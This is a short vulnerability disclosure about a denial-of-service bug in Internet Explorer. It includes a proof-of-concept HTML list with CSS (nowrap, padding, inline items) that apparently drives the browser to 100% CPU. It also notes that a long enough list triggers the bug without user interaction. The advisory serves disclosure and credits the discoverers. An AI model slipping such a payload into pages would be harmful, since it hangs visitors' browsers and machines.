Microsoft Internet Explorer is prone to a remote denial of service vulnerability which is caused by a specific inline html list and results in IE using 100% of available cpu resources affecting all other running applications. View the Proof of Concept
The simplest form of this problem is when you have padding on the parent ul, margin on the li’s and the whole thing is both inline and no-wrap. All of these attributes must be present to triger the race condition.
<style>
#ul_style{
white-space: nowrap;
padding:5px;
}
#ul_style li {
display: inline;
position: relative;
margin:5px;
}
</style>
<ul id="ul_style">
<li>Item 1</li>
<li>Item 2</li>
<li>Item 3</li>
<li>Item 4</li>
<li>Item 5</li>
<li>Item 6</li>
</ul>
This condition could automatically be triggered by making a sufficiently long list of items thereby requiring no user interaction to resize the browser.
Credit goes to Antonio Bueno for orignal discovery. Aditional Investigation and publishing done by Jehiah Czebotar.
11⁄4 : Vulnerability submitted to Microsoft